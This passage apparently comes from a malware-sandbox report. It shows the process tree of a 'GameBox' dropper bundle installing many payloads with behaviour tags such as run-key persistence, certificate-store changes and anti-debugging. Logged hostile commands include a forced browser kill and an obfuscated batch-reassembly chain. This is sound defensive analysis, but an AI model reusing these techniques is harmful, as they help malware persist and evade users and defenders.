                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-6E3N3.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-6E3N3.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279841 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                8⤵
                                                                  PID:7196
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4380
                                                            • C:\Users\Admin\AppData\Local\Temp\is-EIQFS.tmp\VPN.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-EIQFS.tmp\VPN.tmp" /SL5="$20280,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4600
                                                              • C:\Users\Admin\AppData\Local\Temp\is-LGT2M.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-LGT2M.tmp\Setup.exe" /silent /subid=720
                                                                7⤵
                                                                  PID:6112
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-QR5QB.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-QR5QB.tmp\Setup.tmp" /SL5="$90052,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-LGT2M.tmp\Setup.exe" /silent /subid=720
                                                                    8⤵
                                                                      PID:360
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                        9⤵
                                                                          PID:8012
                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                            tapinstall.exe remove tap0901
                                                                            10⤵
                                                                            • Checks SCSI registry key(s)
                                                                            PID:7992
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                          9⤵
                                                                            PID:6708
                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                              10⤵
                                                                                PID:2876
                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                              9⤵
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:8444
                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                              9⤵
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:9208
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1944
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NGSQA.tmp\MediaBurner2.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NGSQA.tmp\MediaBurner2.tmp" /SL5="$30230,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4300
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-RVJKH.tmp\3377047_logo_media.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-RVJKH.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                          7⤵
                                                                          • Drops file in Drivers directory
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Drops file in Program Files directory
                                                                          PID:5192
                                                                          • C:\Program Files\Windows Multimedia Platform\JYWHHZCTBB\ultramediaburner.exe
                                                                            "C:\Program Files\Windows Multimedia Platform\JYWHHZCTBB\ultramediaburner.exe" /VERYSILENT
                                                                            8⤵
                                                                              PID:4396
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-HA0GR.tmp\ultramediaburner.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-HA0GR.tmp\ultramediaburner.tmp" /SL5="$20422,281924,62464,C:\Program Files\Windows Multimedia Platform\JYWHHZCTBB\ultramediaburner.exe" /VERYSILENT
                                                                                9⤵
                                                                                • Drops file in Program Files directory
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:5992
                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                  10⤵
                                                                                    PID:5340
                                                                              • C:\Users\Admin\AppData\Local\Temp\27-cd97a-e49-a4791-6e424aee5e5df\Tatunebijae.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\27-cd97a-e49-a4791-6e424aee5e5df\Tatunebijae.exe"
                                                                                8⤵
                                                                                • Checks computer location settings
                                                                                PID:4552
                                                                              • C:\Users\Admin\AppData\Local\Temp\f8-7f31c-c86-7f1a8-44f97019b2858\Voloqohaexu.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\f8-7f31c-c86-7f1a8-44f97019b2858\Voloqohaexu.exe"
                                                                                8⤵
                                                                                  PID:4620
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kcen344d.f0c\GcleanerEU.exe /eufive & exit
                                                                                    9⤵
                                                                                      PID:7328
                                                                                      • C:\Users\Admin\AppData\Local\Temp\kcen344d.f0c\GcleanerEU.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\kcen344d.f0c\GcleanerEU.exe /eufive
                                                                                        10⤵
                                                                                          PID:7580
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\olbzcapj.w15\installer.exe /qn CAMPAIGN="654" & exit
                                                                                        9⤵
                                                                                          PID:7904
                                                                                          • C:\Users\Admin\AppData\Local\Temp\olbzcapj.w15\installer.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\olbzcapj.w15\installer.exe /qn CAMPAIGN="654"
                                                                                            10⤵
                                                                                              PID:7276
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssidn1wz.ava\ufgaa.exe & exit
                                                                                            9⤵
                                                                                              PID:7504
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3zmxwf1.2ok\anyname.exe & exit
                                                                                              9⤵
                                                                                                PID:5264
                                                                                                • C:\Users\Admin\AppData\Local\Temp\w3zmxwf1.2ok\anyname.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\w3zmxwf1.2ok\anyname.exe
                                                                                                  10⤵
                                                                                                    PID:6484
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\w3zmxwf1.2ok\anyname.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\w3zmxwf1.2ok\anyname.exe" -q
                                                                                                      11⤵
                                                                                                        PID:7700
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wbrtptml.zxv\gcleaner.exe /mixfive & exit
                                                                                                    9⤵
                                                                                                      PID:7224
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wbrtptml.zxv\gcleaner.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\wbrtptml.zxv\gcleaner.exe /mixfive
                                                                                                        10⤵
                                                                                                          PID:7532
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fyakfmmk.y2x\autosubplayer.exe /S & exit
                                                                                                        9⤵
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6912
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4492
                                                                                                • C:\Users\Admin\AppData\Roaming\5552817.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\5552817.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6068
                                                                                                • C:\Users\Admin\AppData\Roaming\6792737.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\6792737.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                  PID:6104
                                                                                                • C:\Users\Admin\AppData\Roaming\3338018.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\3338018.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5140
                                                                                                • C:\Users\Admin\AppData\Roaming\7412383.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\7412383.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4092
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4080
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5556
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1340
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                  6⤵
                                                                                                    PID:4928
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im chrome.exe
                                                                                                      7⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:5980
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks computer location settings
                                                                                                  PID:4548
                                                                                                  • C:\Users\Admin\Documents\FSHm1fRA8vSNyLChour4qxsn.exe
                                                                                                    "C:\Users\Admin\Documents\FSHm1fRA8vSNyLChour4qxsn.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4324
                                                                                                    • C:\Users\Admin\AppData\Roaming\1624083.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\1624083.exe"
                                                                                                      7⤵
                                                                                                        PID:6148
                                                                                                      • C:\Users\Admin\AppData\Roaming\2820750.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\2820750.exe"
                                                                                                        7⤵
                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                        PID:2704
                                                                                                    • C:\Users\Admin\Documents\SiKyjEGNrtiUobcuxE0q3sQq.exe
                                                                                                      "C:\Users\Admin\Documents\SiKyjEGNrtiUobcuxE0q3sQq.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5840
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1UCQJ.tmp\SiKyjEGNrtiUobcuxE0q3sQq.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1UCQJ.tmp\SiKyjEGNrtiUobcuxE0q3sQq.tmp" /SL5="$10426,138429,56832,C:\Users\Admin\Documents\SiKyjEGNrtiUobcuxE0q3sQq.exe"
                                                                                                        7⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:5592
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7N0KD.tmp\Setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7N0KD.tmp\Setup.exe" /Verysilent
                                                                                                          8⤵
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:7108
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                            9⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:3948
                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279841 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                              10⤵
                                                                                                                PID:1608
                                                                                                      • C:\Users\Admin\Documents\EFh1CSya76jWolJJ_pFeU_Vo.exe
                                                                                                        "C:\Users\Admin\Documents\EFh1CSya76jWolJJ_pFeU_Vo.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6072
                                                                                                      • C:\Users\Admin\Documents\flE92gDchoRMPfHow8X3n9M0.exe
                                                                                                        "C:\Users\Admin\Documents\flE92gDchoRMPfHow8X3n9M0.exe"
                                                                                                        6⤵
                                                                                                          PID:4384
                                                                                                        • C:\Users\Admin\Documents\fB__0DUMreXWU4sFFtL3q3BI.exe
                                                                                                          "C:\Users\Admin\Documents\fB__0DUMreXWU4sFFtL3q3BI.exe"
                                                                                                          6⤵
                                                                                                            PID:5920
                                                                                                          • C:\Users\Admin\Documents\rFabcXO5l1SxZkSx9Pp_ipXV.exe
                                                                                                            "C:\Users\Admin\Documents\rFabcXO5l1SxZkSx9Pp_ipXV.exe"
                                                                                                            6⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:6204
                                                                                                          • C:\Users\Admin\Documents\FVq5MXF_0Z0DmIa7ly4ug1L4.exe
                                                                                                            "C:\Users\Admin\Documents\FVq5MXF_0Z0DmIa7ly4ug1L4.exe"
                                                                                                            6⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:5096
                                                                                                          • C:\Users\Admin\Documents\NWjasnErRSsI9Y7Zrzm_bOeK.exe
                                                                                                            "C:\Users\Admin\Documents\NWjasnErRSsI9Y7Zrzm_bOeK.exe"
                                                                                                            6⤵
                                                                                                              PID:4576
                                                                                                            • C:\Users\Admin\Documents\r9_84pvU8HzMQYrFNsvWevZp.exe
                                                                                                              "C:\Users\Admin\Documents\r9_84pvU8HzMQYrFNsvWevZp.exe"
                                                                                                              6⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:5452
                                                                                                            • C:\Users\Admin\Documents\UitdyufHjo8D23htcvsqWCUX.exe
                                                                                                              "C:\Users\Admin\Documents\UitdyufHjo8D23htcvsqWCUX.exe"
                                                                                                              6⤵
                                                                                                                PID:4452
                                                                                                              • C:\Users\Admin\Documents\yhIz1dDoDC96R8b28xEjaNkD.exe
                                                                                                                "C:\Users\Admin\Documents\yhIz1dDoDC96R8b28xEjaNkD.exe"
                                                                                                                6⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4732
                                                                                                                • C:\Users\Admin\Documents\yhIz1dDoDC96R8b28xEjaNkD.exe
                                                                                                                  C:\Users\Admin\Documents\yhIz1dDoDC96R8b28xEjaNkD.exe
                                                                                                                  7⤵
                                                                                                                    PID:6056
                                                                                                                • C:\Users\Admin\Documents\YmWI4dH0RmekNKBFXyDIQLKR.exe
                                                                                                                  "C:\Users\Admin\Documents\YmWI4dH0RmekNKBFXyDIQLKR.exe"
                                                                                                                  6⤵
                                                                                                                    PID:5184
                                                                                                                  • C:\Users\Admin\Documents\6h3F3WdcSxkVPkQ27oiuK3we.exe
                                                                                                                    "C:\Users\Admin\Documents\6h3F3WdcSxkVPkQ27oiuK3we.exe"
                                                                                                                    6⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:3428
                                                                                                                  • C:\Users\Admin\Documents\GOc4v4xi5VzSQi05DjFy69sj.exe
                                                                                                                    "C:\Users\Admin\Documents\GOc4v4xi5VzSQi05DjFy69sj.exe"
                                                                                                                    6⤵
                                                                                                                      PID:5748
                                                                                                                      • C:\Users\Admin\Documents\GOc4v4xi5VzSQi05DjFy69sj.exe
                                                                                                                        C:\Users\Admin\Documents\GOc4v4xi5VzSQi05DjFy69sj.exe
                                                                                                                        7⤵
                                                                                                                          PID:6228
                                                                                                                      • C:\Users\Admin\Documents\NknyLkQEHoE0Pk9V9mBRAJ4N.exe
                                                                                                                        "C:\Users\Admin\Documents\NknyLkQEHoE0Pk9V9mBRAJ4N.exe"
                                                                                                                        6⤵
                                                                                                                          PID:2044
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 660
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6180
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 664
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6436
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 716
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6192
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 712
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6544
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 888
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6196
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 1124
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:576
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 1116
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            • Program crash
                                                                                                                            PID:388
                                                                                                                        • C:\Users\Admin\Documents\K51d4sTnv4gyIEUpHwW6Kn7N.exe
                                                                                                                          "C:\Users\Admin\Documents\K51d4sTnv4gyIEUpHwW6Kn7N.exe"
                                                                                                                          6⤵
                                                                                                                            PID:5552
                                                                                                                            • C:\Users\Admin\Documents\K51d4sTnv4gyIEUpHwW6Kn7N.exe
                                                                                                                              "C:\Users\Admin\Documents\K51d4sTnv4gyIEUpHwW6Kn7N.exe"
                                                                                                                              7⤵
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:8552
                                                                                                                          • C:\Users\Admin\Documents\taHP17Yd_jALQWzCIv16WTPI.exe
                                                                                                                            "C:\Users\Admin\Documents\taHP17Yd_jALQWzCIv16WTPI.exe"
                                                                                                                            6⤵
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:3400
                                                                                                                          • C:\Users\Admin\Documents\MnTooRGDuGNvwNrdfF5mgSJa.exe
                                                                                                                            "C:\Users\Admin\Documents\MnTooRGDuGNvwNrdfF5mgSJa.exe"
                                                                                                                            6⤵
                                                                                                                              PID:2080
                                                                                                                              • C:\Users\Admin\Documents\MnTooRGDuGNvwNrdfF5mgSJa.exe
                                                                                                                                "C:\Users\Admin\Documents\MnTooRGDuGNvwNrdfF5mgSJa.exe" -q
                                                                                                                                7⤵
                                                                                                                                  PID:5596
                                                                                                                              • C:\Users\Admin\Documents\BJ5yH8IBgeHqM7szbKG996EL.exe
                                                                                                                                "C:\Users\Admin\Documents\BJ5yH8IBgeHqM7szbKG996EL.exe"
                                                                                                                                6⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:5104
                                                                                                                                • C:\Users\Admin\Documents\BJ5yH8IBgeHqM7szbKG996EL.exe
                                                                                                                                  C:\Users\Admin\Documents\BJ5yH8IBgeHqM7szbKG996EL.exe
                                                                                                                                  7⤵
                                                                                                                                    PID:6284
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3876
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp49DC_tmp.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tmp49DC_tmp.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:7016
                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:5112
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                        7⤵
                                                                                                                                          PID:1580
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd
                                                                                                                                            8⤵
                                                                                                                                              PID:4764
                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                9⤵
                                                                                                                                                  PID:7112
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  Esplorarne.exe.com i
                                                                                                                                                  9⤵
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:5488
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    10⤵
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:7396
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      11⤵
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:8000
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        12⤵
                                                                                                                                                          PID:7564
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            13⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:7180
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              14⤵
                                                                                                                                                                PID:6964
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  15⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:7920
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    16⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:7616
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      17⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:5824
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:7848
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          19⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:7972
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            20⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:6600
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              21⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:7308
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                22⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:7888
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  23⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:6608
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    24⤵
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:8044
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      25⤵
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:6904
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        26⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:7044
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
